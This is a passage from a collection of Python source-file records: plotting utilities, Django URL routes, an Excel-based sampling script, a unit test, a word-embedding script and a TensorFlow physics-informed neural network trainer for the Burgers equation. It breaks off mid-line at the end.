the value is used as the x_ticks.\n # otherwise, it's the uniform gap and the number of entries is decided by the number of rows.\n for row_number, line in enumerate(file):\n for idx, value in enumerate(line):\n if idx < x_data_cols:\n if uni_x and idx == 0:\n x_data[index].append(row_number)\n elif not uni_x:\n x_data[index].append(int(value))\n else:\n y_data[index][idx - x_data_cols].append(float(value))\n\n return [x_data, y_data]\n\n\ndef plot_curve(x_data, y_data, xticks, xticklabel, yticks, yticklabel, xlabels, ylabels, legends, figsize, titles=None,\n subplots_adjustment=None, with_marker=True, show_ylabel=None, show_legend=None,\n legendsize='x-large', xticklabel_visible=None, yticklabel_visible=None):\n # determine how many subplots in the graph.\n # if the matrix is 3 dimensional, then the first dimension decides the number of subplots.\n # if the matrix is 2 dimensional, then the first dimension decides how many lines in the graph.\n\n # dimension represent the dimension of the graph\n dims = dim(y_data)\n dimension = len(dims)\n if dimension == 2:\n lines = [dims[0]]\n num_graphs = 1\n x_data = [x_data]\n y_data = [y_data]\n xticks = [xticks]\n xticklabel = [xticklabel]\n yticks = [yticks]\n yticklabel = [yticklabel]\n xlabels = [xlabels]\n ylabels = [ylabels]\n elif dimension == 3:\n lines = [len(x) for x in y_data]\n num_graphs = len(y_data)\n else:\n sys.exit(\"wrong dimension of the data\")\n\n line_style = ['-', '--', '-.', ':']\n markers = ['o', 'v', '^', 's', 'x', '+']\n fig, axs = plt.subplots(nrows=1, ncols=num_graphs, figsize=figsize)\n if subplots_adjustment:\n # plt.subplots_adjust(left=0.05, bottom=0.15, right=0.98, top=0.96, wspace=0.27)\n plt.subplots_adjust(left=subplots_adjustment['left'], right=subplots_adjustment['right'],\n top=subplots_adjustment['top'], bottom=subplots_adjustment['bottom'],\n wspace=subplots_adjustment['wspace'], hspace=subplots_adjustment['hspace'])\n\n plt.grid(ls=':', linewidth=1.2, alpha=0.7)\n\n if num_graphs == 1:\n axs = [axs]\n\n for index, axis in enumerate(axs):\n for i in range(lines[index]):\n ax = plt.axes(axis)\n ax.plot(x_data[index], y_data[index][i], marker=(markers[i % len(markers)] if with_marker else None),\n ls=line_style[i % len(line_style)], label=legends[index][i], markersize=6.6)\n ax.xaxis.set_ticks(xticks[index])\n ax.xaxis.set_ticklabels(xticklabel[index])\n ax.yaxis.set_ticks(yticks[index])\n ax.yaxis.set_ticklabels(yticklabel[index])\n ax.tick_params(labelsize=12)\n plt.xlabel(xlabels[index], fontsize='x-large')\n # if show_ylabel is None (default), then only the first graph will plot the ylabel.\n # otherwise the list will be used to determine to show ylabel or not.\n if not show_ylabel:\n if index == 0:\n plt.ylabel(ylabels[index], fontsize='x-large')\n elif show_ylabel[index]:\n plt.ylabel(ylabels[index], fontsize='x-large')\n # if show_legend is None (default), then only the first graph will plot the legend.\n # otherwise the list will be used to determine to show legend or not.\n if not show_legend:\n if index == 0:\n ax.legend(ncol=2, fancybox=True, shadow=True, fontsize=legendsize, loc='upper left')\n elif show_legend[index]:\n ax.legend(ncol=1, fancybox=True, shadow=True, fontsize=legendsize, loc='upper left')\n\n if titles:\n ax.set_title(titles[index], y=-0.3, fontsize='x-large')\n\n # make some ticklabel invisible, default is visible for all ticks\n if xticklabel_visible:\n x_ticks = ax.xaxis.get_major_ticks()\n for index, item in enumerate(xticklabel_visible):\n x_ticks[index].label1.set_visible(item)\n\n if yticklabel_visible:\n y_ticks = ax.yaxis.get_major_ticks()\n for pos, item in enumerate(yticklabel_visible[index]):\n y_ticks[pos].label1.set_visible(item)\n\n # all the subplots will have grid\n plt.grid(ls=':', linewidth=1.2, alpha=0.7)\n\n plt.show()\n","sub_path":"plt_curve/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"191221817","text":"\"\"\"Algo_ser URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom . import view\nurlpatterns = [\n path('admin/', admin.site.urls),\n #path('test_print',view.test_print),\n path('index',view.index),\n #path('save_model',view.save_model),\n #path('test_predict',view.test_predict),\n path('modifyLoginData',view.modifyLoginData),\n path('trainModel',view.trainModel),\n path('predictModel',view.predictModel),\n path('creat_db',view.creat_db),\n path('test',view.test),\n]\n","sub_path":"Algorithm_ser/Algo_ser/Algo_ser/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"206721553","text":"from openpyxl import load_workbook\nfrom scipy.integrate import cumtrapz\nimport random as random\nimport matplotlib.pyplot as plt\nfrom bisect import bisect_left\n\ndef Choice(cdf,x):\n ''' Returns the the chosen value (corresponding to the CDF) that are closest to the choice random value (ranging from 0 to 1)'''\n choice = random.random()\n pos = bisect_left(cdf,choice)\n if pos == 0:\n pos_next = 1\n if pos == len(cdf) or pos == len(cdf)-1:\n pos = len(cdf)-1\n pos_next = len(cdf)-2\n else:\n if abs(choice-cdf[pos-1]) < abs(choice-cdf[pos+1]):\n pos_next = pos-1\n else:\n pos_next = pos+1 \n ''' linear interpolation between these points to esitmate the result '''\n m = abs(cdf[pos]-cdf[pos_next])/abs(x[pos]-x[pos_next])\n value = ((choice - cdf[pos])/m) + x[pos]\n return value\n\ndef CreateCDFDisc(probability,x):\n ''' For a discrete PDF, return a discrete CDF '''\n return cumtrapz(probability,initial=0)*(max(x)-min(x))/len(x),x\n \n\n\n \nwb = load_workbook(filename='ReadScatterData_1.xlsx')\nsheets = [wb['Sheet1'],wb['Sheet2']]\n\nEnergy_1 = []\nEnergy_2 = []\n\nAngles = [[],[]]\nProbs = [[],[]]\nCDF = [[],[]]\n\nEnergy_dic = [Energy_1,Energy_2]\n\nfor column in range(int(64/2)):\n Energy_1.append((sheets[0].cell(row=0,column=2*column)).value)\nfor column in range(int(252/2)):\n Energy_2.append((sheets[1].cell(row=0,column=2*column)).value)\n \nEnergy_current = [[],[]]\n \n \n\n \ndef DataBaseChoice(energy,choice):\n \n index_energy = min(range(len(Energy_dic[choice])),key=lambda i: abs(Energy_dic[choice][i]-energy))\n if Energy_dic[choice][index_energy] not in Energy_current[choice]:\n Energy_current[choice].append(Energy_dic[choice][index_energy])\n cosine , probs = [] , []\n row , angle = 0 , 0\n while angle != None:\n angle = sheets[choice].cell(row=row+2,column=2*index_energy).value\n prob = sheets[choice].cell(row=row+2,column=2*index_energy+1).value\n if angle == None:\n break\n cosine.append(angle)\n probs.append(prob)\n row += 1\n cdf , cosine = CreateCDFDisc(probs,cosine)\n Angles[choice].append(cosine)\n Probs[choice].append(probs)\n CDF[choice].append(cdf)\n current_index = Energy_current[choice].index(Energy_dic[choice][index_energy])\n angle = Choice(CDF[choice][current_index],Angles[choice][current_index])\n return angle\n\nhister = []\nfor i in range(10000):\n hister.append(DataBaseChoice(1.5E8,0))\n \nplt.hist(hister)","sub_path":"Methods/DataBaseRetrival_Dynamic.py","file_name":"DataBaseRetrival_Dynamic.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"64655168","text":"\"\"\"RITSOFT URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom RITSOFT_APP import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n\n # account urls\n path('', views.home, name='home'),\n path('about/', views.about, name='about'),\n path('contact/', views.contact, name='contact'),\n path('login/', views.login_redirect, name='login'),\n path('logout/', views.logout_view, name='logout'),\n\n # admin urls\n path('admin_home/', views.admin_home, name='admin_home'),\n\n path('designation/', views.designation, name='designation'),\n path('fetch_faculty/', views.fetch_faculty_of_dept, name='fetch_faculty'),\n path('fetch_designation/', views.fetch_designation_of_faculty, name='fetch_designation'),\n\n path('add_academic_year/', views.add_academic_year, name='add_academic_year'),\n path('change_academic_year/', views.change_academic_year, name='change_academic_year'),\n\n]\n","sub_path":"RITSOFT/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"643947835","text":"import torch\n\nfrom fastNLP.core.sampler import convert_to_torch_tensor, SequentialSampler, RandomSampler\n\n\ndef test_convert_to_torch_tensor():\n data = [[1, 2, 3, 4, 5], [5, 4, 3, 2, 1], [1, 3, 4, 5, 2]]\n ans = convert_to_torch_tensor(data, False)\n assert isinstance(ans, torch.Tensor)\n assert tuple(ans.shape) == (3, 5)\n\n\ndef test_sequential_sampler():\n sampler = SequentialSampler()\n data = [1, 3, 5, 7, 9, 2, 4, 6, 8, 10]\n for idx, i in enumerate(sampler(data)):\n assert idx == i\n\n\ndef test_random_sampler():\n sampler = RandomSampler()\n data = [1, 3, 5, 7, 9, 2, 4, 6, 8, 10]\n ans = [data[i] for i in sampler(data)]\n assert len(ans) == len(data)\n for d in ans:\n assert d in data\n\n\nif __name__ == \"__main__\":\n test_sequential_sampler()\n","sub_path":"test/core/test_sampler.py","file_name":"test_sampler.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"267928512","text":"import os\nimport openpyxl\n\n\n\n\nclass UtvarderaFil:\n\n def __init__(self, root, fil):\n self.fil = fil\n self.filplats = os.path.join(root, fil).replace(\"\\\\\",\"/\")\n\n def returnera_filplats(self):\n return self.filplats\n\n def avgor_om_excel(self):\n if self.filplats.endswith(\".xlsx\") or self.filplats.endswith(\".xlsm\"):\n return True\n\n def storlek(self):\n try:\n storlek = os.path.getsize(self.filplats)\n if storlek < 700000:\n return True\n except:\n return False\n\n def avgor_om_berper(self):\n if self.avgor_om_excel() and self.storlek():\n try:\n wb = openpyxl.load_workbook(self.filplats, data_only=True)\n except:\n return \"fel\"\n for sheet in wb.worksheets:\n cell_kst = sheet.cell(31, 7).value\n cell_projledare = sheet.cell(34, 7).value\n if isinstance(cell_kst, str) == True and isinstance(cell_projledare, str) == True:\n if cell_kst.lower() == \"kst\" and cell_projledare.lower() == \"projektledare\":\n wb.close()\n return sheet\n wb.close()\n\n def filnamn_clean(self):\n filnamn_clean = os.path.splitext(self.fil)[0]\n return filnamn_clean","sub_path":"utvarderafil.py","file_name":"utvarderafil.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"642844830","text":"#Francisco Arriaga, Lab4, CS2302, stores words with their embeddings and calculates similarities\r\n#between pairs of words\r\n\r\nimport numpy\r\nfrom numpy import dot\r\nfrom numpy.linalg import norm\r\nfrom HashTable import*\r\n\r\ndef reader(s):\r\n file = open(s, encoding=\"utf8\")\r\n\r\n array = file.readlines()\r\n words = []\r\n\r\n counter = 0\r\n for i in range(len(array)):\r\n line = array[i].split()\r\n if line[0].isalpha():\r\n words.append([])\r\n for j in line:\r\n words[counter].append(j)\r\n counter += 1\r\n\r\n return words\r\n\r\n\r\ndef hasher(strings):\r\n\r\n hash_table = HashTable(len(strings)//1000)\r\n\r\n for s in strings:\r\n hash_table.insert(s)\r\n\r\n return hash_table\r\n\r\n\r\ndef sims(hash_table, words):\r\n\r\n for i in range(0, 9, 2):\r\n word1 = hash_table.search(words[i][0])\r\n word2 = hash_table.search(words[i + 1][0])\r\n\r\n # print(word1)\r\n # print(word2)\r\n\r\n # cosine_sim = dot(word1, word2) / (norm(word1) * norm(word2))\r\n # print(words[i], \" - \", words[i + 1], \": \", cosine_sim)\r\n\r\n print()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n return None\r\n\r\ndef main():\r\n words = reader(\"glove.6B.50d.txt\")\r\n\r\n hash_table = hasher(words)\r\n\r\n load_factor = hash_table.get_load_factor()\r\n print(\"load factor:\", load_factor)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nmain()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Lab4.py","file_name":"Lab4.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"345182096","text":"import sys\nsys.path.insert(0, '../')\nimport tensorflow as tf\nimport numpy as np\nimport scipy.io\nfrom scipy.interpolate import griddata\nfrom pyDOE import lhs\nimport matplotlib.pyplot as plt\nfrom plotting import newfig, savefig\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.gridspec as gridspec\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport time\nfrom constrained_optim_Adam_model_param import ConstrainedOptAdamModel\nimport os\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import explained_variance_score\nfrom sklearn.metrics import max_error\n\nnp.random.seed(1234)\ntf.set_random_seed(1234)\n\nclass DPM:\n # Initialize the class\n def __init__(self, X_u, u, X_f, layers, lb, ub, nu, learning_rate, epsilon, delta, w):\n\n self.lb = lb\n self.ub = ub\n\n self.x_u = X_u[:, 0:1]\n self.t_u = X_u[:, 1:2]\n\n self.x_f = X_f[:, 0:1]\n self.t_f = X_f[:, 1:2]\n\n self.u = u\n\n self.layers = layers\n self.nu = nu\n\n self.learning_rate = tf.constant(learning_rate)\n self.epsilon = epsilon\n self.delta = delta\n self.w = w \n \n # Initialize NNs\n self.weights, self.biases = self.initialize_NN(layers)\n self.saver = tf.train.Saver(max_to_keep=30000)\n\n # tf placeholders and graph\n self.sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True,\n log_device_placement=True))\n\n self.x_u_tf = tf.placeholder(tf.float32, shape=[None, self.x_u.shape[1]])\n self.t_u_tf = tf.placeholder(tf.float32, shape=[None, self.t_u.shape[1]])\n self.u_tf = tf.placeholder(tf.float32, shape=[None, self.u.shape[1]])\n\n self.x_f_tf = tf.placeholder(tf.float32, shape=[None, self.x_f.shape[1]])\n self.t_f_tf = tf.placeholder(tf.float32, shape=[None, self.t_f.shape[1]])\n\n self.u_pred = self.net_u(self.x_u_tf, self.t_u_tf)\n self.f_pred = self.net_f(self.x_f_tf, self.t_f_tf)\n\n \n self.loss_u = tf.reduce_mean(tf.square(self.u_tf - self.u_pred)+0.01*tf.nn.l2_loss(self.W_reg)) \n self.loss_f = tf.reduce_mean(tf.square(self.f_pred)+0.01*tf.nn.l2_loss(self.W_reg))\n\n \n self.partial_loss = self.loss_u + tf.nn.relu(self.loss_f - self.epsilon)\n self.new_loss = self.partial_loss\n self.norelu_loss = self.loss_u + self.loss_f\n \n self.mape_u = tf.reduce_mean(tf.abs(self.u_tf - self.u_pred) / tf.abs(self.u_tf))\n \n self.var_u = tf.math.reduce_variance(tf.square(self.u_tf - self.u_pred))\n self.var_f = tf.math.reduce_variance(tf.square(self.f_pred))\n self.var_mape_u = tf.math.reduce_variance(tf.abs(self.u_tf - self.u_pred) / tf.abs(self.u_tf))\n\n self.worst_u = tf.math.reduce_max(tf.square(self.u_tf - self.u_pred))\n self.worst_f = tf.math.reduce_max(tf.square(self.f_pred))\n self.worst_mape_u = tf.reduce_max(tf.abs(self.u_tf - self.u_pred) / tf.abs(self.u_tf))\n self.opt = tf.train.AdamOptimizer(learning_rate= self.learning_rate)\n \n self.com = ConstrainedOptAdamModel(lr=self.learning_rate, opt=self.opt, loss=self.norelu_loss,\n delta=self.delta, w = self.w)\n self.update_Adam = self.com.adapt_budget_penalty(self.loss_u, self.loss_f - self.epsilon, None)\n \n # tf session\n self.sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True,\n log_device_placement=True))\n\n init = tf.global_variables_initializer()\n self.sess.run(init)\n\n def initialize_NN(self, layers):\n weights = []\n biases = []\n num_layers = len(layers)\n for l in range(0, num_layers - 1):\n W = self.xavier_init(size=[layers[l], layers[l + 1]])\n b = tf.Variable(tf.zeros([1, layers[l + 1]], dtype=tf.float32), dtype=tf.float32)\n self.W = W\n self.b = b\n weights.append(W)\n biases.append(b)\n return weights, biases\n\n def xavier_init(self, size):\n in_dim = size[0]\n out_dim = size[1]\n xavier_stddev = np.sqrt(2 / (in_dim + out_dim))\n return tf.Variable(tf.truncated_normal([in_dim, out_dim], stddev=xavier_stddev), dtype=tf.float32)\n\n def neural_net(self, X, weights, biases):\n num_layers = len(weights) + 1\n H = 2.0 * (X - self.lb) / (self.ub - self.lb) - 1.0\n self.W_reg = weights[0]\n b = biases[0]\n H = tf.tanh(tf.add(tf.matmul(H, self.W_reg), b))\n for l in range(1, num_layers - 2):\n self.W_reg = weights[l]\n b = biases[l]\n H = tf.tanh(tf.add(tf.add(tf.matmul(H, self.W_reg), b), H))\n self.W_reg = weights[-1]\n b = biases[-1]\n Y = tf.add(tf.matmul(H, self.W_reg), b)\n\n return Y\n\n def net_u(self, x, t):\n u = self.neural_net(tf.concat([x, t], 1), self.weights, self.biases)\n return u\n\n def net_f(self, x, t):\n u = self.net_u(x, t)\n u_t = tf.gradients(u, t)[0]\n u_x = tf.gradients(u, x)[0]\n u_xx = tf.gradients(u_x, x)[0]\n f = u_t + u * u_x - self.nu * u_xx\n\n return f\n\n def callback(self, loss):\n print('Loss', loss)\n\n\n def train(self, nIter, n_outlook, diff_loss, X_val_star, u_val_star, num_layers, num_neurons, learning_rate, epsilon, delta, w):\n\n tf_dict = {self.x_u_tf: self.x_u, self.t_u_tf: self.t_u, self.u_tf: self.u,\n self.x_f_tf: self.x_f, self.t_f_tf: self.t_f}\n\n n_epoch = []\n\n val_err = []\n\n loss_of_all = []\n loss_of_u = []\n loss_of_f = []\n\n mean_of_epoch_u = []\n mean_of_epoch_f = []\n mean_of_mape_u = []\n\n var_of_epoch_u = []\n var_of_epoch_f = []\n var_of_mape_u = []\n\n worst_of_epoch_u = []\n worst_of_epoch_f = []\n worst_of_mape_u = []\n\n best_val = np.inf\n \n start_time = time.time()\n \n \n for it in range(nIter): \n _, new_loss, lossu, lossf,_com_overbudget= self.sess.run([self.update_Adam, self.norelu_loss, self.loss_u, self.loss_f,self.com.overbudget], tf_dict)\n \n loss_of_all.insert(it, self.sess.run(self.new_loss, tf_dict))\n loss_of_u.insert(it, lossu)\n loss_of_f.insert(it, lossf)\n\n mean_of_epoch_u.insert(it, self.sess.run(self.loss_u, tf_dict))\n mean_of_epoch_f.insert(it, self.sess.run(self.loss_f, tf_dict))\n mean_of_mape_u.insert(it, self.sess.run(self.mape_u, tf_dict))\n\n var_of_epoch_u.insert(it, self.sess.run(self.var_u, tf_dict))\n var_of_epoch_f.insert(it, self.sess.run(self.var_f, tf_dict))\n var_of_mape_u.insert(it, self.sess.run(self.var_mape_u, tf_dict))\n\n worst_of_epoch_u.insert(it, self.sess.run(self.worst_u, tf_dict))\n worst_of_epoch_f.insert(it, self.sess.run(self.worst_f, tf_dict))\n worst_of_mape_u.insert(it, self.sess.run(self.worst_mape_u, tf_dict))\n\n n_epoch.insert(it, it)\n\n if it % n_outlook == 0:\n self.saver.save(self.sess,\n './tf_model/Viscous_burgers-con_limit-ResNet-DPM-%d-%d-%.4f-%.4f-%.3f-%.3f-%d.ckpt' % (\n num_layers, num_neurons, learning_rate, epsilon, delta, w ,it))\n\n u_tf_pred, f_tf_pred = self.predict_val(X_val_star)\n val_error = np.linalg.norm(u_val_star - u_tf_pred, 2) / np.linalg.norm(u_val_star, 2)\n val_err.insert(it, val_error)\n\n if best_val > val_error:\n best_val = val_error\n i = it\n self.saver.save(self.sess,'./tf_model/Viscous_burgers-con_limit-ResNet-DPM-%d-%d-%.4f-%.4f-%.3f-%.3f.ckpt' % (\n num_layers, num_neurons, learning_rate, epsilon, delta, w))\n elapsed = time.time() - start_time\n print('It: %d, Loss: %.3e, Time: %.2f over_budget : %.3f' % (it, new_loss, elapsed,_com_overbudget))\n start_time = time.time()\n\n return loss_of_all, loss_of_u, loss_of_f, mean_of_epoch_u, mean_of_epoch_f, mean_of_mape_u, var_of_epoch_u, var_of_epoch_f, \\\n var_of_mape_u, worst_of_epoch_u, worst_of_epoch_f, worst_of_mape_u, n_epoch, best_val, val_err, i\n\n def predict_val(self, X_star):\n u_star = self.sess.run(self.u_pred, {self.x_u_tf: X_star[:, 0:1], self.t_u_tf: X_star[:, 1:2]})\n f_star = self.sess.run(self.f_pred, {self.x_f_tf: X_star[:, 0:1], self.t_f_tf: X_star[:, 1:2]})\n\n return u_star, f_star\n\n def predict(self, X_star, it):\n self.saver.restore(self.sess,\n './tf_model/Viscous_burgers-con_limit-ResNet-DPM-%d-%d-%.4f-%.4f-%.3f-%.3f-%d.ckpt' % (\n num_layers, num_neurons, learning_rate, epsilon, delta, w, it))\n\n u_star = self.sess.run(self.u_pred, {self.x_u_tf: X_star[:, 0:1], self.t_u_tf: X_star[:, 1:2]})\n f_star = self.sess.run(self.f_pred, {self.x_f_tf: X_star[:, 0:1], self.t_f_tf: X_star[:, 1:2]})\n\n return u_star, f_star\n\n def plotting_whole_graph(self, U_star, U_pred, X_u_train, u_train, x, t, Exact):\n \n fig, ax = newfig(1.0, 0.5)\n ax.axis('off')\n \n ####### Row 0: ground truth u(t,x) ##################\n gs0 = gridspec.GridSpec(1, 2)\n gs0.update(top=4.75, bottom=4.15, left=0.15, right=0.85, wspace=0)\n ax = plt.subplot(gs0[:, :])\n \n h = ax.imshow(U_star.T, interpolation='nearest', cmap='rainbow',\n extent=[t.min(), t.max(), x.min(), x.max()],\n origin='lower', aspect='auto')\n divider = make_axes_locatable(ax)\n cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n fig.colorbar(h, cax=cax)\n \n ax.plot(X_u_train[:, 1], X_u_train[:, 0], 'kx', label='Data (%d points)' % (u_train.shape[0]), markersize=4,\n clip_on=False)\n \n line = np.linspace(x.min(), x.max(), 2)[:, None]\n ax.plot(t[:, 1000] * np.ones((2, 1)), line, 'w-', linewidth=1)\n ax.plot(t[:, 1372] * np.ones((2, 1)), line, 'w-', linewidth=1)\n \n ax.set_xlabel('$t$')\n ax.set_ylabel('$x$')\n ax.legend(frameon=False, loc='best')\n ax.set_title('$u(t,x)$', fontsize=10)\n \n ####### Row 1: prediction u(t,x) ##################\n gs1 = gridspec.GridSpec(1, 2)\n gs1.update(top=3.75, bottom=3.15, left=0.15, right=0.85, wspace=0)\n ax = plt.subplot(gs1[:, :])\n \n h = ax.imshow(U_pred.T, interpolation='nearest', cmap='rainbow',\n extent=[t.min(), t.max(), x.min(), x.max()],\n origin='lower', aspect='auto')\n divider = make_axes_locatable(ax)\n cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n fig.colorbar(h, cax=cax)\n \n ax.plot(X_u_train[:, 1], X_u_train[:, 0], 'kx', label='Data (%d points)' % (u_train.shape[0]), markersize=4,\n clip_on=False)\n \n line = np.linspace(x.min(), x.max(), 2)[:, None]\n ax.plot(t[:, 172] * np.ones((2, 1)), line, 'w-', linewidth=1)\n ax.plot(t[:, 515] * np.ones((2, 1)), line, 'w-', linewidth=1)\n ax.plot(t[:, 800] * np.ones((2, 1)), line, 'w-', linewidth=1)\n ax.plot(t[:, 1007] * np.ones((2, 1)), line, 'w-', linewidth=1)\n ax.plot(t[:, 1149] * np.ones((2, 1)), line, 'w-', linewidth=1)\n ax.plot(t[:, 1372] * np.ones((2, 1)), line, 'w-', linewidth=1)\n ax.plot(t[:, 1429] * np.ones((2, 1)), line, 'w-', linewidth=1)\n ax.plot(t[:, 1606] * np.ones((2, 1)), line, 'w-', linewidth=1)\n ax.plot(t[:, 1972] * np.ones((2, 1)), line, 'w-', linewidth=1)\n \n ax.set_xlabel('$t$')\n ax.set_ylabel('$x$')\n ax.legend(frameon=False, loc='best')\n ax.set_title('$u(t,x)$', fontsize=10)\n \n ####### Row 2: training set interpolation ##################\n \n gs2 = gridspec.GridSpec(1, 3)\n gs2.update(top=2.75, bottom=2.1, left=0.1, right=0.9, wspace=0.5)\n \n ax = plt.subplot(gs2[:, 0])\n ax.plot(x.transpose(), Exact[172, :], 'b-', linewidth=2, label='Exact')\n ax.plot(x.transpose(), U_pred[172, :], 'r--', linewidth=2, label='Prediction')\n ax.set_xlabel('$x$')\n ax.set_ylabel('$u(t,x)$')\n ax.set_title('$t = 2.9925$', fontsize=10)\n ax.set_xlim([-5, 105])\n ax.set_ylim([0, 6])\n \n ax = plt.subplot(gs2[:, 1])\n ax.plot(x.transpose(), Exact[515, :], 'b-', linewidth=2, label='Exact')\n ax.plot(x.transpose(), U_pred[515, :], 'r--', linewidth=2, label='Prediction')\n ax.set_xlabel('$x$')\n ax.set_ylabel('$u(t,x)$')\n ax.set_xlim([-5, 105])\n ax.set_ylim([0, 6])\n ax.set_title('$t = 8.995$', fontsize=10)\n \n ax = plt.subplot(gs2[:, 2])\n ax.plot(x.transpose(), Exact[800, :], 'b-', linewidth=2, label='Exact')\n ax.plot(x.transpose(), U_pred[800, :], 'r--', linewidth=2, label='Prediction')\n ax.set_xlabel('$x$')\n ax.set_ylabel('$u(t,x)$')\n ax.set_xlim([-5, 105])\n ax.set_ylim([0, 6])\n ax.set_title('$t = 13.9825$', fontsize=10)\n\n ####### Row 3: training set interpolation ##################\n gs3 = gridspec.GridSpec(1, 3)\n gs3.update(top=1.7, bottom=1.05, left=0.1, right=0.9, wspace=0.5)\n \n ax = plt.subplot(gs3[:, 0])\n ax.plot(x.transpose(), Exact[1007, :], 'b-', linewidth=2, label='Exact')\n ax.plot(x.transpose(), U_pred[1007, :], 'r--', linewidth=2, label='Prediction')\n ax.set_xlabel('$x$')\n ax.set_ylabel('$u(t,x)$')\n ax.set_title('$t = 17.605$', fontsize=10)\n ax.set_xlim([-5, 105])\n ax.set_ylim([0, 6])\n \n ax = plt.subplot(gs3[:, 1])\n ax.plot(x.transpose(), Exact[1149, :], 'b-', linewidth=2, label='Exact')\n ax.plot(x.transpose(), U_pred[1149, :], 'r--', linewidth=2, label='Prediction')\n ax.set_xlabel('$x$')\n ax.set_ylabel('$u(t,x)$')\n ax.set_xlim([-5, 105])\n ax.set_ylim([0, 6])\n ax.set_title('$t = 20.09$', fontsize=10)\n \n ax = plt.subplot(gs3[:, 2])\n ax.plot(x.transpose(), Exact[1372, :], 'b-', linewidth=2, label='Exact')\n ax.plot(x.transpose(), U_pred[1372, :], 'r--', linewidth=2, label='Prediction')\n ax.set_xlabel('$x$')\n ax.set_ylabel('$u(t,x)$')\n ax.set_xlim([-5, 105])\n ax.set_ylim([0, 6])\n ax.set_title('$t = 23.9925$', fontsize=10)\n\n ####### Row 4: training set interpolation ##################\n gs4 = gridspec.GridSpec(1, 3)\n gs4.update(top=0.65, bottom=0, left=0.1, right=0.9, wspace=0.5)\n ax = plt.subplot(gs4[:, 0])\n ax.plot(x.transpose(), Exact[1429, :], 'b-', linewidth=2, label='Exact')\n ax.plot(x.transpose(), U_pred[1429, :], 'r--', linewidth=2, label='Prediction')\n ax.set_xlabel('$x$')\n ax.set_ylabel('$u(t,x)$')\n ax.set_title('$t = 24.99$', fontsize=10)\n ax.set_xlim([-5, 105])\n ax.set_ylim([0, 6])\n \n ax = plt.subplot(gs4[:, 1])\n ax.plot(x.transpose(), Exact[1606, :], 'b-', linewidth=2, label='Exact')\n ax.plot(x.transpose(), U_pred[1606, :], 'r--', linewidth=2, label='Prediction')\n ax.set_xlabel('$x$')\n ax.set_ylabel('$u(t,x)$')\n ax.set_xlim([-5, 105])\n ax.set_ylim([0, 6])\n ax.set_title('$t = 28.0875$', fontsize=10)\n ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.35), ncol=5, frameon=False)\n \n ax = plt.subplot(gs4[:, 2])\n ax.plot(x.transpose(), Exact[1972, :], 'b-', linewidth=2, label='Exact')\n ax.plot(x.transpose(), U_pred[1972, :], 'r--', linewidth=2, label='Prediction')\n ax.set_xlabel('$x$')\n ax.set_ylabel('$u(t,x)$')\n ax.set_xlim([-5, 105])\n ax.set_ylim([0, 6])\n ax.set_title('$t = 34.4925$', fontsize=10)\n \n # savefig('./figures/Viscous_burgers-DPM-%d-%d-%.4f-%.3f-%.2f-%.3f' % (num_layers, num_neurons, learning_rate, epsilon, delta, w))\n\n\ndef main_loop(num_layers, num_neurons, learning_rate, epsilon, delta, w):\n\n N_u = 100\n N_f = 10000\n\n nu = 0.01 / np.pi\n\n num_layers = num_layers\n num_neurons = num_neurons\n learning_rate = learning_rate\n epsilon = epsilon\n delta = delta \n w = w \n \n layers = np.concatenate([[2], num_neurons * np.ones(num_layers), [1]]).astype(int).tolist()\n data = scipy.io.loadmat(\"../../Data/burgers_shock.mat\")\n\n t = data['t'].flatten()[:, None]\n x = data['x'].flatten()[:, None]\n Exact = np.real(data['usol']).T\n\n len1 = len(t[t <= 0.5]) \n len2 = len(t[t <= 0.8]) \n t_train = t[0: len1, :]\n t_val = t[len1:len2, :] \n t_test = t[len2:, :]\n\n Exact_train = Exact[: len1, :]\n Exact_val = Exact[len1:len2, :] \n Exact_test = 